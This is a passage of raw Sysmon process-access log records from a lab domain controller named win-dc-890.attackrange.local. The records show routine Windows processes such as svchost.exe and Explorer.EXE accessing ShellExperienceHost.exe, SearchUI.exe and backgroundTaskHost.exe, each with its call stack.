\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\R
PCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\